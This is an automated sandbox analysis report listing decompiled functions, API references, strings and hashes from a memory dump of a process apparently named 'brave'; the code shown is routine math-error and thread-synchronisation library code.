0x7ff6a6011271
0x7ff6a6011276
0x7ff6a6011280
0x7ff6a6011293
0x7ff6a60112a0
0x7ff6a60112ab
0x7ff6a60112ac
0x7ff6a60112ad
0x7ff6a60112af
0x7ff6a60112b8
0x7ff6a60112bd
0x7ff6a60112c5
0x7ff6a60112cc
0x7ff6a60112d3
0x7ff6a60112d8
0x7ff6a60112dd
0x7ff6a60112e3
0x7ff6a60112ed
0x7ff6a60112fa
0x7ff6a6011309
0x7ff6a601130c
0x7ff6a6011318

Strings

%p not found?!?!, xrefs: 00007FF6A601132E

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %p not found?!?!
API String ID: 0-11085004
Opcode ID: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction ID: 6f23453a519b2527cb2e3775ec2e0d68e3c3034fcc06b2c9122f09eaba93739c
Opcode Fuzzy Hash: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction Fuzzy Hash: FB512021A0B70680FE699B55D2553B966E0EF65F88F4880B5CE4CC27D1DF3EA8E5C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF6A600E530() {
				intOrPtr* _t8;

				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x50], xmm7");
				asm("inc esp");
				if ( *_t8 - 6 > 0) goto 0xa600e61c;
				goto __rax;
			}

0x7ff6a600e536
0x7ff6a600e53b
0x7ff6a600e540
0x7ff6a600e549
0x7ff6a600e55f

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597
Unknown error, xrefs: 00007FF6A600E61C

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction ID: 0a8fe374dc037486c1dd0342cb5c80ad439eb60bc2c54b7da82a4567475b1ca8
Opcode Fuzzy Hash: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction Fuzzy Hash: 6801C862909E84C2D6068F1CE4411FA7374FF59B9AF645321EB8C7A264DF2AD593C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E5D0() {

				goto 0xa600e56f;
				goto 0xa600e56f;
				0;
				return 0;
			}

0x7ff6a600e617
0x7ff6a600e623
0x7ff6a600e62e
0x7ff6a600e632

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

Argument domain error (DOMAIN), xrefs: 00007FF6A600E5D0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction ID: 0e020e900371cf1cfa38ce089efde059fac46bafdb5700b713bb217b73102409
Opcode Fuzzy Hash: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction Fuzzy Hash: 68F06222909E8482D2028F2CA4401EB7374FF5DB89F685325EF8D7A565DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E5F0() {

				goto 0xa600e56f;
				goto 0xa600e56f;
				0;
				return 0;
			}

0x7ff6a600e617
0x7ff6a600e623
0x7ff6a600e62e
0x7ff6a600e632

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597
Overflow range error (OVERFLOW), xrefs: 00007FF6A600E5F0

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction ID: 40c0a03ac16a572d719e63da16f9904c45582da4cdeb0cc9b7ad38c94b01cea7
Opcode Fuzzy Hash: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction Fuzzy Hash: 34F06222909E8882D2029F2CA4401EB7374FF5DB89F685325EF8D7A565DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E5E0() {

				goto 0xa600e56f;
				goto 0xa600e56f;
				0;
				return 0;
			}

0x7ff6a600e617
0x7ff6a600e623
0x7ff6a600e62e
0x7ff6a600e632

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF6A600E5E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction ID: 51608266d53cd682342c33ad980a06c5f48a2c415a25e0865328b361742fc7ce
Opcode Fuzzy Hash: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction Fuzzy Hash: F3F06222909E8482D2028F2CA4401EB7374FF5DB89F685325EF8D7A565DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E610() {

				goto 0xa600e56f;
				goto 0xa600e56f;
				0;
				return 0;
			}

0x7ff6a600e617
0x7ff6a600e623
0x7ff6a600e62e
0x7ff6a600e632

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

Total loss of significance (TLOSS), xrefs: 00007FF6A600E610
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction ID: f5728e4e40e300151ee6411fda80b266c61bb2e77859a088aefaa8975a8df828
Opcode Fuzzy Hash: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction Fuzzy Hash: 12F06222919E8482D2428F2CA4001EB7374FF5DB89F685365EF8D7A565DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E600() {

				goto 0xa600e56f;
				goto 0xa600e56f;
				0;
				return 0;
			}

0x7ff6a600e617
0x7ff6a600e623
0x7ff6a600e62e
0x7ff6a600e632

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF6A600E600

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction ID: f7d5c5301bc89ac3308345742b0bb13577c349fc99320663ca7c43b3eaa9fe28
Opcode Fuzzy Hash: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction Fuzzy Hash: 1AF06226909E8882D2028F2CA4001EBB374FF5DB89F685325EF8D7A565DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E568 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6A600E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6A600E597
Argument singularity (SIGN), xrefs: 00007FF6A600E568

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction ID: 4482c59b08e3682a050eb40919b2faca3640a83b910bed3a3579ad21d4ef6db3
Opcode Fuzzy Hash: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction Fuzzy Hash: D6F09622805F8482D202CF2CA4001AB7374FF5DB89F545325EF8D3A525DF29D5838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019550 Relevance: 5.1, APIs: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6019550(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0xa60195f0;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0xa60195f0;
				if (_t6 == 0xffffffff) goto 0xa6019660;
				if ( *_t6 == 0xc0bab1fd) goto 0xa6019590;
				return 0x16;
			}

0x7ff6a601955c
0x7ff6a6019562
0x7ff6a6019568
0x7ff6a6019572
0x7ff6a6019583
0x7ff6a601958e

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6A6019597
LeaveCriticalSection.KERNEL32 ref: 00007FF6A60195C1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction ID: af3fcb81a6d500787249107a757503b112f1e70b848cdf8ffc57b3d36cea4183
Opcode Fuzzy Hash: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction Fuzzy Hash: 8C318F73A0A6468AE754CF35D54466A33A0FB40F6CF584136CD2A8A388DF3DE8D5CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019880 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00007FF67FF6A6019880(intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t19;
				void* _t27;
				intOrPtr* _t28;

				_t19 =  *__rcx;
				_t28 = __rcx;
				EnterCriticalSection(??);
				_t14 =  *((intOrPtr*)(_t19 + 0xc));
				if (_t14 == 0) goto 0xa6019900;
				 *((intOrPtr*)(_t19 + 0xc)) = _t27 - 1;
				LeaveCriticalSection(??);
				if (_t14 != 1) goto 0xa60198da;
				if (E00007FF67FF6A6018880(1,  *((intOrPtr*)(_t19 + 0xa8)), _t19 + 0x70, _t19 + 0x98) != 0) goto 0xa60198e7;
				_t12 = E00007FF67FF6A60104E0( *((intOrPtr*)(_t28 + 8)));
				if (_t12 == 0) goto 0xa60198ed;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x10)))) = _t12;
				return _t12;
			}

0x7ff6a601988c
0x7ff6a6019893
0x7ff6a6019899
0x7ff6a601989f
0x7ff6a60198a4
0x7ff6a60198ac
0x7ff6a60198af
0x7ff6a60198b8
0x7ff6a60198d8
0x7ff6a60198de
0x7ff6a60198e5
0x7ff6a60198eb
0x7ff6a60198f9

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6A6019899
LeaveCriticalSection.KERNEL32 ref: 00007FF6A60198AF

Part of subcall function 00007FF6A6018880: EnterCriticalSection.KERNEL32 ref: 00007FF6A6018898
Part of subcall function 00007FF6A6018880: ReleaseSemaphore.KERNEL32 ref: 00007FF6A60188C6
Part of subcall function 00007FF6A6018880: LeaveCriticalSection.KERNEL32 ref: 00007FF6A60188D3

LeaveCriticalSection.KERNEL32 ref: 00007FF6A6019913

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
String ID:
API String ID: 3630377130-0
Opcode ID: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction ID: 558e7692fafbf3e0008a87dab752f8bb9cdb0a161344d65dd4815dd5d9b6782a
Opcode Fuzzy Hash: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction Fuzzy Hash: 9E316C32A066029BE7549F36D9106AA33A0FB85FACF584131DE1DC7389DF3AE495C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019410 Relevance: 5.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6019410(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0xa60194a8;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0xa60194a8;
				if (_t6 == 0xffffffff) goto 0xa6019510;
				if ( *_t6 == 0xc0bab1fd) goto 0xa6019450;
				return 0x16;
			}

0x7ff6a601941a
0x7ff6a6019420
0x7ff6a6019426
0x7ff6a6019430
0x7ff6a6019441
0x7ff6a601944a

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6A6019457
LeaveCriticalSection.KERNEL32 ref: 00007FF6A601947E

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction ID: 660ef836385d6a5a659ae6ea140dbcd64801d35a15243aad94bedc27e2fa9709
Opcode Fuzzy Hash: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction Fuzzy Hash: 3A316172A0A6028BE754CF35D50466933A0FB44F6CF588235CE2D8A788DF3AE4D5C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6019120 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF6A6019749), ref: 00007FF6A6019146
LeaveCriticalSection.KERNEL32(?,00007FF6A6019749,?,?,?,?,?,?,?,?,?,?,?,00007FF6A62C1400,?), ref: 00007FF6A601916B
EnterCriticalSection.KERNEL32(?,00007FF6A6019749,?,?,?,?,?,?,?,?,?,?,?,00007FF6A62C1400,?), ref: 00007FF6A601919C
LeaveCriticalSection.KERNEL32(?,00007FF6A6019749,?,?,?,?,?,?,?,?,?,?,?,00007FF6A62C1400,?), ref: 00007FF6A60191A6

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

